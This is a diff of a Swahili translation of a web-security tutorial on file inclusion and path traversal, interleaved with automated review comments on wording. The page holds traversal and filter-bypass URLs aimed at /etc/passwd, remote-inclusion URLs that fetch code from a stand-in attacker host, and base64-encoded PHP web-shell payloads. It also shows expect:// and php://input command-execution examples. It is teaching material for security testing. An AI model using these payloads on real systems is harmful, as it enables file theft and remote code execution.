Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia ikiwa udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
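Review bot: "**Nimechanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**" has two main verbs ("Nimechanganya ... nimeunda") with no connective, so it reads as a run-on; the previous "Kwa kuchanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:" was grammatical and should be kept.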
@ -40,22 +40,22 @@ Muungano wa wordlists tofauti:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuondoa `C:/` na kuongeza `../../../../../`
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuondoa `C:/` na kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia ikiwa udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
### **OS X**
Angalia orodha ya LFI ya linux.
Kagua orodha ya LFI ya linux.
## Msingi wa LFI na njia za kukwepa
## Misingi ya LFI na bypasses
Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)//>).
Mifano yote ni kwa Local File Inclusion lakini pia inaweza kutumika kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
```
http://example.com/index.php?page=../../../etc/passwd
```
### Mfululizo wa traversal uliokatwa bila rekursia
### traversal sequences zilizokatwa bila kurudi kwa msururu
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
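Review bot: the RFI example link is malformed in both versions: `(page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>)` mixes an escaped backslash, an angle-bracketed destination and a stray `/>`, and changing `//>` to `/>` does not repair it. Replace the whole construct with a plain code span, `page=http://myserver.com/phpshellcode.txt`, which is all the sentence needs.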
@ -63,15 +63,15 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**
Bypass kuongezwa kwa viongezi mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
Bypass kuongezwa kwa chars mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
Hii ime **tatuliwa tangu PHP 5.4**
Hii **imetatuliwa tangu PHP 5.4**
### **Encoding**
### **Kodishaji**
Unaweza kutumia encoding zisizo za kawaida kama double URL encode (na nyingine):
Unaweza kutumia kodishaji zisizo za kawaida kama double URL encode (na nyingine):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
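Review bot: the heading "### **Kodishaji**" for "Encoding" uses a non-standard coinage; the established Swahili term is "usimbaji", and since the body already says "double URL encode", keeping "Encoding" (as the previous version did) is the clearer choice. "Bypass kuongezwa kwa chars mwishoni mwa string" also switches language where "herufi" would do.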
@ -80,42 +80,42 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### Kutoka kwenye folda iliyopo
Huenda back-end inakagua njia ya folda:
Labda back-end inakagua njia ya folda:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Kuchunguza Saraka za Mfumo wa Faili kwenye Seva
### Kuchunguza Saraka za Mfumo wa Faili kwenye Server
Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kujaribu kuwepo kwa folda maalum. Hapa chini ni njia ya kina ya kufanikisha hili:
Mfumo wa faili wa server unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kuchunguza kuwepo kwa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:
1. **Tambua Kina cha Saraka:** Bainisha kina cha saraka unayotumia kwa kupata kwa mafanikio faili ya `/etc/passwd` (inayotumika ikiwa seva ni ya Linux). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukionyesha kina cha tatu:
1. **Determine Directory Depth:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili ya `/etc/passwd` (inatumika ikiwa server ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukiashiria kina cha tatu:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Chunguza Folda:** Ongeza jina la folda unayoshuku (mfano, `private`) kwenye URL, kisha rudi kwenye `/etc/passwd`. Ngazi ya ziada ya directory inahitaji kuongeza kina kwa moja:
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi kwa `/etc/passwd`. Ngazi ya directory ya ziada inahitaji kuongeza depth kwa moja:
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **Tafsiri Matokeo:** Majibu ya server yanaonyesha ikiwa saraka ipo:
- **Hitilafu / Hakuna Matokeo:** Saraka `private` huenda haipo katika eneo lililotajwa.
- **Maudhui ya `/etc/passwd`:** Uwepo wa saraka ya `private` unathibitishwa.
4. **Uchunguzi wa Rekursivu:** Saraka zilizogunduliwa zinaweza kuchunguzwa zaidi kwa kuangalia saraka ndogo au faili kwa kutumia mbinu ile ile au mbinu za kimila za Local File Inclusion (LFI).
3. **Tafsiri Matokeo:** Jibu la server linaonyesha kama folda ipo:
- **Error / No Output:** Inawezekana folda `private` haipo mahali ulioletwa.
- **Contents of `/etc/passwd`:** Uwepo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa folda ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI).
Ili kuchunguza directories katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina saraka ya `private` (kwa kuzingatia kwamba saraka ya sasa iko katika kina cha 3), tumia:
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (ikiwa current directory iko kwa kina cha 3), tumia:
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**
Path truncation ni mbinu inayotumika kubadilisha njia za faili katika programu za wavuti. Mara nyingi hutumiwa kufikia faili zilizozuiliwa kwa kupita hatua za usalama ambazo zinaongeza herufi au alama mwishoni mwa njia za faili. Lengo ni kutengeneza njia ya faili ambayo, mara itakaporudishwa au kuharibiwa na hatua ya usalama, bado itaonyesha kwenye faili linalotakiwa.
Path truncation ni mbinu inayotumiwa kubadilisha njia za faili katika maombi ya wavuti. Mara nyingi hutumika kufikia faili zilizozuiliwa kwa kuruka hatua fulani za usalama ambazo zinaongeza alama za ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapo badilishwa na hatua ya usalama, bado itaelekeza kwenye faili inayotakiwa.
Katika PHP, uwakilishi tofauti wa njia ya faili unaweza kutazamwa kuwa sawa kutokana na tabia ya mfumo wa faili. Kwa mfano:
Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuzingatiwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, na `/etc/passwd/` zote huhesabiwa kama njia ile ile.
- Wakati herufi 6 za mwisho ni `passwd`, kuongeza `/` (kufanya kuwa `passwd/`) hakubadilishi faili linalolengwa.
- Vivyo hivyo, ikiwa `.php` imeambatanishwa na njia ya faili (kama `shellcode.php`), kuongeza `/.` mwishoni haitabadili faili inayofunguliwa.
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote zinachukuliwa kuwa njia moja.
- Wakati herufi 6 za mwisho ni `passwd`, kuongezea a `/` (kufanya `passwd/`) hakubadilishi faili inayolengwa.
- Vivyo vivyo, ikiwa `.php` inaongezwa kwenye njia ya faili (kwa mfano `shellcode.php`), kuongeza `/.` mwishoni haitabadilishi faili inayofikiwa.
Mifano iliyoonyeshwa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na yaliyomo nyeti (taarifa za akaunti za watumiaji):
Mifano iliyopewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za watumiaji):
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
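Review bot: the retranslated path-equivalence bullets still carry English fragments and a typo: the first keeps "and" between `/etc/./passwd` and `/etc/passwd/` where the removed line had "na"; the second reads "kuongezea a `/`" (drop the English article: "kuongeza `/`"); and the third opens with "Vivyo vivyo" instead of "Vivyo hivyo". Suggest fixing these three before merging, since the lines being replaced had them right.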
@ -125,17 +125,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini idadi hiyo inaweza kutofautiana kulingana na usanidi wa server.
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa seva.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) uliounganishwa na dot segments za ziada na characters unaweza kutumika kusogeza kwenye file system, kwa ufanisi kupuuza appended strings zinazoongezwa na server.
- **Determining the Required Number of Traversals**: Kupitia majaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika ili kufika kwenye root directory kisha hadi `/etc/passwd`, kuhakikisha kuwa appended strings yoyote (kama `.php`) zimekatizwa lakini path inayotakiwa (`/etc/passwd`) bado iko sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza path na directory isiyekuwepo (kama `a/`). This technique inatumika kama hatua ya tahadhari au kutimiza mahitaji ya server ya path parsing logic.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) ukichanganywa na sehemu za dot za ziada na herufi unaweza kutumika kuvinjari mfumo wa faili, kwa ufanisi kupuuza mnyororo uliowekwa na seva.
- **Determining the Required Number of Traversals**: Kupitia jaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika kufika kwa directory ya mzizi na kisha kwa `/etc/passwd`, kuhakikisha kwamba nyongeza yoyote iliyowekwa (kama `.php`) inafutwa lakini njia inayotakiwa (`/etc/passwd`) inabaki sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza njia na directory isiyo ya kweli (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya seva ya kuchanganua njia.
When employing path truncation techniques, it's crucial to understand the server's path parsing behavior and filesystem structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya seva ya kuchanganua njia na muundo wa filesystem. Kila hali inaweza kuhitaji mbinu tofauti, na mara nyingi upimaji unahitajika kugundua mbinu yenye ufanisi zaidi.
**This vulnerability was corrected in PHP 5.3.**
**Udhaifu huu ulirekebishwa katika PHP 5.3.**
### **Filter bypass tricks**
### **Njia za kuzunguka kichujio**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
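Review bot: in the "Using Dot Segments and Additional Characters" bullet, "kupuuza mnyororo uliowekwa na seva" renders "appended strings" as a chain (mnyororo) and loses the idea of something being appended to the path, which the removed line kept ("appended strings zinazoongezwa na server"); suggest "kupuuza nyuzi zinazoongezwa na seva mwishoni mwa njia". The rest of the hunk (the ~2027-traversal note and the PHP 5.3 line) translates cleanly.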
@ -145,45 +145,45 @@ http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inatakiwa iwe **On** ili ifanye kazi, na katika hali hiyo unaweza kujumuisha faili la PHP kutoka kwenye seva yako na kupata RCE:
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili ifanye kazi, na katika kesi hiyo unaweza kujumuisha faili ya PHP kutoka kwenye server yako na kupata RCE:
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
Iwapo kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP **inachuja** ufikiaji wa kurasa za nje, [kulingana na chapisho hiki](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol na base64 ku-decode PHP code ya b64 na kupata RCE:
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP ina **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ili ku-decoda msimbo wa PHP wa b64 na kupata RCE:
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
> [!TIP]
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu attacker alikuwa anahitaji mnyororo uliomalizika na `.txt`, hivyo mnyororo unamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha tu taka na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu mshambulizi alihitaji string ambayo ilihitimisha kwa `.txt`, kwa hivyo string inahitimisha nayo na baada ya b64 decode sehemu hiyo itarudisha takataka tu na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
Mfano mwingine **usiotumia `php://` protocol** ni:
Mfano mwingine **usiotumia `php://` protocol** ungekuwa:
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
## Kipengele cha mzizi cha Python
## Elementi ya Root ya Python
Katika Python, katika msimbo kama huu:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
Ikiwa mtumiaji atapitisha **njia kamili** kwa **`file_name`**, **njia iliyotangulia itaondolewa tu**:
Ikiwa mtumiaji atatoa **absolute path** kwa **`file_name`**, **previous path** inafutwa tu:
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
Hii ni tabia iliyokusudiwa kulingana na [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
> Ikiwa sehemu ni njia kamili (absolute path), vipengele vyote vya awali vinatupwa na kuunganishwa kunaendelea kutoka kwenye sehemu ya njia kamili.
> Ikiwa sehemu ni njia kamili, sehemu zote zilizotangulia zinatupwa na kuunganisha kunaendelea kutoka kwenye sehemu ya njia kamili.
## Java Orodha za direktori
## Java Orodhesha madirektori
Inaonekana kwamba ikiwa una Path Traversal katika Java na unaomba **direktori** badala ya faili, **orodha ya direktori itarudishwa**. Hii haitatokea katika lugha nyingine (afaik).
Inaonekana kwamba ikiwa una Path Traversal katika Java na unauliza **folda** badala ya faili, **orodha ya folda itarudishwa**. Hii haitatokee katika lugha nyingine (kwa kadiri ninavyojua).
## Vigezo 25 Bora
## Vigezo 25 vya Juu
Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa nyeti kwa local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
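Review bot: the Remote File Inclusion example block is fenced as ```python although it only contains URLs; a bare fence, as the data:// block below uses, is correct. Two details visible in the same region are worth fixing while here: the first URL spells the host `atacker.com`, and the second data:// payload ends in `+txt` while the php://filter one ends in `+.txt`, so the two examples no longer agree with the tip that explains the trailing `.txt`.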
@ -211,38 +211,38 @@ Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa nyeti kwa local file in
?mod={payload}
?conf={payload}
```
## LFI / RFI using PHP wrappers & protocols
## LFI / RFI kutumia PHP wrappers & protocols
### php://filter
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko ya data** kabla ya kusomwa au kuandikwa. Kuna makundi 5 ya filters:
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data** kabla ya data kusomwa au kuandikwa. Kuna aina 5 za filters:
- [String Filters](https://www.php.net/manual/en/filters.string.php):
- `string.rot13`
- `string.toupper`
- `string.tolower`
- `string.strip_tags`: Ondoa tags kutoka kwa data (kila kitu kati ya herufi "<" na ">" chars)
- Note that this filter has disappear from the modern versions of PHP
- `string.strip_tags`: Ondoa tags kutoka kwenye data (kila kitu kati ya "<" na ">" chars)
- Kumbuka kuwa chujio hiki kimeondoka katika matoleo ya kisasa ya PHP
- [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
- `convert.base64-encode`
- `convert.base64-decode`
- `convert.quoted-printable-encode`
- `convert.quoted-printable-decode`
- `convert.iconv.*` : Inabadilisha kwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya mifumo yote ya usimbaji** zinazoungwa mkono endesha kwenye console: `iconv -l`
- `convert.iconv.*` : Hubadilisha kuwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya encodings zote** zinazotumika endesha kwenye console: `iconv -l`
> [!WARNING]
> Kwa kutumia vibaya filter ya `convert.iconv.*` unaweza **kuzalisha maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya function kama include kushughulikia maandishi yoyote. Kwa taarifa zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
> Kwa kutumia vibaya chujio cha `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya include process isimamie maandishi yoyote. Kwa habari zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
- [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
- `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
- `zlib.inflate`: Decompress the data
- [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
- `mcrypt.*` : Imepitwa na wakati
- `mdecrypt.*` : Imepitwa na wakati
- `mcrypt.*` : Deprecated
- `mdecrypt.*` : Deprecated
- Other Filters
- Ukirusha katika php `var_dump(stream_get_filters());` utaona couple ya **filters zisizotarajiwa**:
- Ukiendesha katika php `var_dump(stream_get_filters());` utaona baadhi ya **vichujio visivyotarajiwa**:
- `consumed`
- `dechunk`: reverses HTTP chunked encoding
- `dechunk`: inarudisha nyuma HTTP chunked encoding
- `convert.*`
```php
# String Filters
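Review bot: the `mcrypt.*` and `mdecrypt.*` entries go backwards, replacing the Swahili "Imepitwa na wakati" with the English "Deprecated" while every neighbouring entry is translated; keep the Swahili. The `zlib.deflate` / `zlib.inflate` descriptions are still English in both versions and could be translated in the same pass.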
@ -271,39 +271,39 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
> [!WARNING]
> Sehemu "php://filter" haizingati tofauti kati ya herufi kubwa na ndogo
> Sehemu "php://filter" haizingatii tofauti za herufi
### Kutumia php filters kama oracle kusoma faili yoyote
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) imependekezwa mbinu ya kusoma faili ya ndani bila kupata output ikirudi kutoka kwa server. Mbinu hii inategemea boolean exfiltration ya faili (char kwa char) ikitumia php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya text iwe kubwa vya kutosha ili kusababisha php itoke exception.
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) inapendekeza mbinu ya kusoma faili ya ndani bila server kurudisha yaliyomo. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kuongeza maandishi kiasi cha kutosha kushinikiza php kutoa hitilafu.
Katika postu ya asili utaona maelezo ya kina ya mbinu, lakini hapa ni muhtasari mfupi:
Katika post ya asili unaweza kupata maelezo ya kina ya mbinu hii, lakini hapa kuna muhtasari mfupi:
- Tumia codec **`UCS-4LE`** ili kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa namna ya eksponential.
- Hii itatumika kuzalisha text kubwa kiasi kwamba wakati herufi ya mwanzo inakadiriwa kwa usahihi php itasababisha **error**
- Filter ya **dechunk** itaondoa kila kitu ikiwa char ya kwanza si hexadecimal, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na ile ya awali (na filters nyingine kulingana na herufi inayokadiriwa), itatuwezesha kukisia herufi mwanzoni mwa text kwa kuona tunapofanya transformations za kutosha kufanya isiwe character ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitaiondoa na bomu la awali litasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa kuwa ikiwa tunaweka codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena character ya hexadecimal, kwa hivyo dechunk haitaiondoa na php error itachocheka kwa sababu inazidisha na bomu la awali.
- Kutumia transformations nyingine kama **rot13** mwanzoni inawezekana leak chars wengine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kusogeza herufi nyingine kwa kiwango cha hex).
- Wakati char ya mwanzo ni nambari inahitajika ku-base64 encode na leak herufi 2 za kwanza ili leak nambari.
- Shida ya mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata kwenye nafasi ya kwanza herufi nyingine za text.
- Na ili kuwezesha kupata **further data** wazo ni **kuzalisha 2 bytes za junk data mwanzoni** kwa **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** ili kufanya i-pivot na 2 bytes zinazofuata, na futa data hadi kufikia junk data (hii itaondoa 2 bytes za kwanza za text ya awali). Endelea kufanya hivi hadi ufikie kipande unachotaka leak.
- Tumia codec **`UCS-4LE`** kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string ukuwe kwa kiasi kinachoongezeka kwa kasi (exponentially).
- Hii itatumika kuzalisha **maandishi makubwa sana wakati herufi ya mwanzo itakaponikuliwa kwa usahihi** kiasi kwamba php itasababisha **error**.
- Filter ya **dechunk** itafuta kila kitu **ikiwa char ya kwanza si hexadecimal**, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na iliyo hapo awali (na filters nyingine kulingana na herufi iliyokisiwa), itatuwezesha kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe herufi ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitafuta na mlipuko wa awali utasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa sababu ikiwa tutaweka codec hii 6 mara a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaiangusha na php error itasababisha kwa sababu inazidisha na initial bomb.
- Kwa kutumia mabadiliko mingine kama **rot13** mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine kwenye eneo la hex).
- Wakati char ya mwanzo ni namba inahitajika kui-base64 encode na leak herufi 2 za kwanza ili leak namba hiyo.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata mahali pa kwanza herufi nyingine za maandishi.
- Na ili kuwaze kupata **further data** wazo ni **kutengeneza 2 bytes za junk data mwanzoni** kwa kutumia **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** kuzifanya zi**pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itaondoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivyo hadi utakapofikia sehemu unayotaka leak.
Katika postu pia ilifunuliwa zana ya kutekeleza hii moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
Katika post pia ilileak zana ya kufanya hili moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
### php://fd
Hii wrapper inaruhusu kupata access kwa file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate content ya opened files:
This wrapper inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate yaliyomo ya faili zilizofunguliwa:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (sijui jinsi hii ingeweza kuwa muhimu katika shambulio)
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (Sijui jinsi hii ingefaa katika attack)
### zip:// and rar://
Pakia faili ya Zip au Rar yenye PHPShell ndani na uifikishe.\
Ili kuweza kutumia vibaya protokoli ya rar, lazima iwe **imewezeshwa mahsusi**.
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.\
Ili kuweza abuse the rar protocol, inahitaji **kuwezeshwa mahsusi**
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
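Review bot: the `convert.iconv.UNICODE.CP930` bullet reads "6 mara" (should be "mara 6") and "tabia ya hexadecimal", where "tabia" means behaviour; the preceding bullet's "herufi ya hexadecimal" is the right term. In the "further data" bullet the bold markers open mid-word ("zi**pivot with the next 2 bytes**", "d**elete the data until the junk data**"), which will not render as bold. "Katika post pia ilileak zana" turns "released a tool" into "leaked a tool"; the removed "ilifunuliwa" was correct. Finally "This wrapper inaruhusu" and "Ili kuweza abuse the rar protocol" leave English fragments (and drop the sentence's final period) that the old lines had translated.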
@ -328,11 +328,11 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
Kumbuka kwamba protokoli hii imezuiwa na mipangilio ya php **`allow_url_open`** na **`allow_url_include`**
Kumbuka kwamba protokoli hii inadhibitiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
### expect://
Expect inapaswa kuwezeshwa. Unaweza kutekeleza code ukitumia hivi:
Expect inapaswa kuwa imewezeshwa. Unaweza kutekeleza msimbo kwa kutumia hii:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
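Review bot: both the removed and the added line name the php.ini directive **`allow_url_open`**; the real directive is `allow_url_fopen` (alongside `allow_url_include`), so the retranslation is the moment to correct the identifier rather than carry the typo forward.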
@ -345,7 +345,7 @@ curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system
```
### phar://
Faili ya `.phar` inaweza kutumiwa kutekeleza msimbo wa PHP wakati programu ya wavuti inapotumia kazi kama `include` kwa ajili ya kupakia faili. Kipande cha msimbo cha PHP kilichoonyeshwa hapa chini kinaonyesha uundaji wa faili ya `.phar`:
Faili la `.phar` linaweza kutumika kutekeleza PHP code wakati programu ya wavuti inapotumia function kama `include` kwa ajili ya kupakia faili. Kipande cha PHP cha chini kinaonyesha uundaji wa faili la `.phar`:
```php
<?php
$phar = new Phar('test.phar');
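Review bot: "Kipande cha PHP cha chini" reads as "the lower PHP snippet"; the removed line's "kipande ... kilichoonyeshwa hapa chini" ("shown below") is what is meant. The same line also switches "msimbo wa PHP" to "PHP code"; keep one term for code across the page.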
@ -354,15 +354,15 @@ $phar->addFromString('test.txt', 'text');
